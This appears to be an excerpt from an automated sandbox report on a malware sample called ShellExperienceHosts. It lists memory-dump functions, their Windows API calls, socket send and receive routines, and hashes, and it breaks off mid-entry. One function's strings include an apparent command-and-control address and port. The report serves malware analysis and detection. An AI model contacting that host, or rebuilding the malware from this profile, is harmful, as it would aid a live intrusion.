                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                            • String ID:
                                                                            • API String ID: 2605973128-0
                                                                            • Opcode ID: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
                                                                            • Instruction ID: 68b1d39f7c788df30121c4cd9fa650265093b70568a06a1b8131812e88253602
                                                                            • Opcode Fuzzy Hash: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
                                                                            • Instruction Fuzzy Hash: EB21D170A00709AFEB14DFA9DC85B9EFBF4FF44745F00C5ADE949E2644EA30A8108790
                                                                            Function 033211B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __floor_pentium4.LIBCMT ref: 033211E9
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03321226
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03321255
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                            • String ID:
                                                                            • API String ID: 2605973128-0
                                                                            • Opcode ID: 954ceaf07e5cf2d3dc7274f9e06e57d44902ca391897fad33a78dea16d7792fb
                                                                            • Instruction ID: c7385750f3169bd40e060242d8e7079be90c2c31b9d26d6d44e2b4771d430827
                                                                            • Opcode Fuzzy Hash: 954ceaf07e5cf2d3dc7274f9e06e57d44902ca391897fad33a78dea16d7792fb
                                                                            • Instruction Fuzzy Hash: 53219F75E00709AFDB10DFADD985B6EFBF8EF40B05F0085A9E949E2640EB30B8108750
                                                                            Function 10001100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __floor_pentium4.LIBCMT ref: 1000112F
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 1000115F
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001192
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                            • String ID:
                                                                            • API String ID: 2605973128-0
                                                                            • Opcode ID: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
                                                                            • Instruction ID: ccfbffdb8cfccccbf267e057733e19453fb850e329b77576dd89ff791b5dae30
                                                                            • Opcode Fuzzy Hash: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
                                                                            • Instruction Fuzzy Hash: 77119670A00709ABEB14DFA9DC86B9EF7F4FF04745F008569EE59D2240E671A9148750
                                                                            Function 03321100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __floor_pentium4.LIBCMT ref: 0332112F
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0332115F
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03321192
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                            • String ID:
                                                                            • API String ID: 2605973128-0
                                                                            • Opcode ID: 6cab5527f08b8b816b9d337634c81c830dfba5faf25ee0fd318f3e328052ca35
                                                                            • Instruction ID: 4456e845e9d17353c12ce91a273bb604f6121080ae1433d109017182da238f14
                                                                            • Opcode Fuzzy Hash: 6cab5527f08b8b816b9d337634c81c830dfba5faf25ee0fd318f3e328052ca35
                                                                            • Instruction Fuzzy Hash: D4118175E00708ABDB109FA9DDC5B6EFBB8EF04705F0085A9E959E2240E770A9108750
                                                                            Function 6C86BAE0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,00000000,CF830579,?,6C86BC6E,00000000,CF830579,6C8E96D0,0000000C,6C86BBF6,6C85EE16,?), ref: 6C86BB36
                                                                            • GetLastError.KERNEL32 ref: 6C86BB40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CloseErrorHandleLast
                                                                            • String ID: "q
                                                                            • API String ID: 918212764-1686213398
                                                                            • Opcode ID: ea16db28809552091ea7e35b30adbc8eba0e9fbfe1518d2deba962e240cdf00a
                                                                            • Instruction ID: 955e3fa7e519ce6b2438cf071d00ab3cba6b511c7881147904a80137427a6ec8
                                                                            • Opcode Fuzzy Hash: ea16db28809552091ea7e35b30adbc8eba0e9fbfe1518d2deba962e240cdf00a
                                                                            • Instruction Fuzzy Hash: 121159326052182ACA34463FAA05FBD37A98F4373DF250A39F92986EC4DBB088409290
                                                                            Function 03329DE0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03329E04
                                                                            • GdipDisposeImage.GDIPLUS(?), ref: 03329E18
                                                                            • GdipDisposeImage.GDIPLUS(?), ref: 03329E3B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                            • String ID:
                                                                            • API String ID: 800915452-0
                                                                            • Opcode ID: a2e6311966bda3e504e44860452d67a1df57c8c0e52ea1552ded3813bb104f78
                                                                            • Instruction ID: b8a168402d1b5ab72b216615f1542b20a6a430eeba51242fd71aa1d7346aa85a
                                                                            • Opcode Fuzzy Hash: a2e6311966bda3e504e44860452d67a1df57c8c0e52ea1552ded3813bb104f78
                                                                            • Instruction Fuzzy Hash: 5DF03176D00229978B10EF94D8848AFFBB9AB45711F05455AF805BB354DB309A15CBD1
                                                                            Function 03329AC0 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(0334FB64), ref: 03329ADC
                                                                            • GdiplusStartup.GDIPLUS(0334FB60,?,?), ref: 03329B15
                                                                            • LeaveCriticalSection.KERNEL32(0334FB64), ref: 03329B26
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                            • String ID:
                                                                            • API String ID: 389129658-0
                                                                            • Opcode ID: ff0105f8721bf93a29825930cce5d7130d7ddd48f3afa7ad6d4de1ac43a03aff
                                                                            • Instruction ID: b37204f209eb5252582e34732d14c4c2dd416e511f7e3aba0333b1974486d2ef
                                                                            • Opcode Fuzzy Hash: ff0105f8721bf93a29825930cce5d7130d7ddd48f3afa7ad6d4de1ac43a03aff
                                                                            • Instruction Fuzzy Hash: 0BF062759412099FDF00EFD1E8EA7ABBBBCF705305F440199E50492141DB722154CBE2
                                                                            Function 10003200 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 15sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: 118.107.44.112$18091
                                                                            • API String ID: 3472027048-2998964670
                                                                            • Opcode ID: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
                                                                            • Instruction ID: d4922cd372dd7236031f7b79510b5f56ce2b8beeb54c8bf7640301d5853f9da9
                                                                            • Opcode Fuzzy Hash: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
                                                                            • Instruction Fuzzy Hash: C9D023F0604871CBE928C500DC5447A7375F7C42513940105FC479B144CB74FC08D550
                                                                            Function 10007156 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd_noexit.LIBCMT ref: 1000715B
                                                                              • Part of subcall function 10009896: GetLastError.KERNEL32(00000001,00000000,10007112,10006F0C,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 1000989A
                                                                              • Part of subcall function 10009896: ___set_flsgetvalue.LIBCMT ref: 100098A8
                                                                              • Part of subcall function 10009896: __calloc_crt.LIBCMT ref: 100098BC
                                                                              • Part of subcall function 10009896: DecodePointer.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 100098D6
                                                                              • Part of subcall function 10009896: GetCurrentThreadId.KERNEL32 ref: 100098EC
                                                                              • Part of subcall function 10009896: SetLastError.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 10009904
                                                                            • __freeptd.LIBCMT ref: 10007165
                                                                              • Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A79
                                                                              • Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A8B
                                                                              • Part of subcall function 10009A58: DecodePointer.KERNEL32(00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009AA1
                                                                              • Part of subcall function 10009A58: __freefls@4.LIBCMT ref: 10009AAC
                                                                              • Part of subcall function 10009A58: TlsSetValue.KERNEL32(00000021,00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009ABE
                                                                            • ExitThread.KERNEL32 ref: 1000716E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 4224061863-0
                                                                            • Opcode ID: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
                                                                            • Instruction ID: 88b9861ec1dd8ad2b25034eab61c1c94f8d4b81d5381debfb6d8fd2c6c03db1f
                                                                            • Opcode Fuzzy Hash: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
                                                                            • Instruction Fuzzy Hash: 79C02B3050060C7BFB00A776CC0E95F3A8DDF811C1F668010F80CC5159EE38FC008291
                                                                            Function 6C73731E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C737325
                                                                              • Part of subcall function 6C6E3FFF: __EH_prolog3_GS.LIBCMT ref: 6C6E4009
                                                                              • Part of subcall function 6C6E3FFF: GetCurrentThread.KERNEL32 ref: 6C6E4068
                                                                              • Part of subcall function 6C6E3FFF: GetCurrentThreadId.KERNEL32 ref: 6C6E4071
                                                                              • Part of subcall function 6C6E3FFF: GetVersionExW.KERNEL32 ref: 6C6E410D
                                                                              • Part of subcall function 6C737608: __EH_prolog3.LIBCMT ref: 6C73760F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentH_prolog3Thread$H_prolog3_Version
                                                                            • String ID: Workspace
                                                                            • API String ID: 3621167777-258310842
                                                                            • Opcode ID: ce2493f77e2529e162872a958e7b01220b3ae02185872ff596526a535c50e63e
                                                                            • Instruction ID: 409afa04bef014f27e05b4dd48f1c568b7861f66ecd16dc7c6bff9483cd54d34
                                                                            • Opcode Fuzzy Hash: ce2493f77e2529e162872a958e7b01220b3ae02185872ff596526a535c50e63e
                                                                            • Instruction Fuzzy Hash: 4F21F3B0A01A56EFC758CF78C544BD9FAA4BF49304F50872A903DA7740D7706629CB95
                                                                            Function 031A01CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 031A022B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                            • Instruction ID: 152f33c81f1c04fd291e4e65cc2f7acffd2b889e5a8e233fba8d5fd6b8390867
                                                                            • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                            • Instruction Fuzzy Hash: EDA13D79A00A06EFDB14CFADC880AAEB7B5FF4C305F1881A9E415DB651D770E951CB90
                                                                            Function 6C86BE0A Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C86C1B4: GetConsoleOutputCP.KERNEL32(05BCD017,00000000,00000000,00000000), ref: 6C86C217
                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,?,6C86022D,00000000,00000000), ref: 6C86BF8F
                                                                            • GetLastError.KERNEL32 ref: 6C86BF99
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                            • String ID:
                                                                            • API String ID: 2915228174-0
                                                                            • Opcode ID: a89eef81f6dc3a39e76a8e2b96420c5fad6a4245ac8fd78a80678e752a588843
                                                                            • Instruction ID: 231fcf8d670cc2f391feb7cca452115f520ae7b4024fe45a4abdb82e5991fa9f
                                                                            • Opcode Fuzzy Hash: a89eef81f6dc3a39e76a8e2b96420c5fad6a4245ac8fd78a80678e752a588843
                                                                            • Instruction Fuzzy Hash: 7461D471D04119AFDF21DFA9CA44EEEBBB9AF0A30CF140955F910A7A12D332D905DBA0
                                                                            Function 10003350 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Time_memmovetime
                                                                            • String ID:
                                                                            • API String ID: 1463837790-0
                                                                            • Opcode ID: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
                                                                            • Instruction ID: 7472951ecdc6142c721ad3348498c8fe017ad8d952fa801f9fd3c423b9f36496
                                                                            • Opcode Fuzzy Hash: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
                                                                            • Instruction Fuzzy Hash: A5519F767006029FE316CF69C8C0A9BB7A9FF48294715C669E919CB709DB31FC51CB90
                                                                            Function 10002FB0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003023
                                                                            • recv.WS2_32(?,?,00040000,00000000), ref: 10003044
                                                                              • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexitrecvselect
                                                                            • String ID:
                                                                            • API String ID: 4248608111-0
                                                                            • Opcode ID: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
                                                                            • Instruction ID: 1cbb114b02e0d86a534962cf0a51f77a1151a50c8d60f66bd4e8238187776ab9
                                                                            • Opcode Fuzzy Hash: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
                                                                            • Instruction Fuzzy Hash: 7F21E770A01318EBFB11DF64DC95B9B73B8EF053D0F1081A5E5095B199DBB1AD84CBA1
                                                                            Function 03322FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03323043
                                                                            • recv.WS2_32(?,?,00040000,00000000), ref: 03323064
                                                                              • Part of subcall function 0332F91B: __getptd_noexit.LIBCMT ref: 0332F91B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexitrecvselect
                                                                            • String ID:
                                                                            • API String ID: 4248608111-0
                                                                            • Opcode ID: 4a22114ee7a163ecc7336b5ad7390d3f86b132129b07d64dde714ca443363a57
                                                                            • Instruction ID: ae67ac47a3c116bd7d4d00d02398e273e868ad6857817e3351deb5e1106b0eca
                                                                            • Opcode Fuzzy Hash: 4a22114ee7a163ecc7336b5ad7390d3f86b132129b07d64dde714ca443363a57
                                                                            • Instruction Fuzzy Hash: 1921A8789003289FDB20EF69DCC5B9B7BB4EF04720F1845A5E5459F190D778A984CBB1
                                                                            Function 6C86C5E3 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,?,6C86BF75,00000000,?,00000000,?,00000000,00000000), ref: 6C86C67F
                                                                            • GetLastError.KERNEL32 ref: 6C86C6A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID:
                                                                            • API String ID: 442123175-0
                                                                            • Opcode ID: 36c3575d328ebe5206170519712a3216e15082b651cd7aa3a4a1171c1e8923dc
                                                                            • Instruction ID: 3747ec6ce5425d2b0e26a70490a1ab56d20c96074b25c967d744daddeb78980e
                                                                            • Opcode Fuzzy Hash: 36c3575d328ebe5206170519712a3216e15082b651cd7aa3a4a1171c1e8923dc
                                                                            • Instruction Fuzzy Hash: A521B130A002199BCF29DF1AC9809DDB7B9EB4D305F2485AEE906D7612D730DE46CF65
                                                                            Function 03323260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • send.WS2_32(?,?,00040000,00000000), ref: 03323291
                                                                            • send.WS2_32(?,?,?,00000000), ref: 033232CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: send
                                                                            • String ID:
                                                                            • API String ID: 2809346765-0
                                                                            • Opcode ID: 55d86d05b1e9edb7fd8f8241ea4acd49ec1cb6a552e8fd68b8b9a0a614a8ce91
                                                                            • Instruction ID: 9413f97fa54afdc008cd33bfa4adbe6e9ebd57cae2ee4116db96fc57ac72fcdc
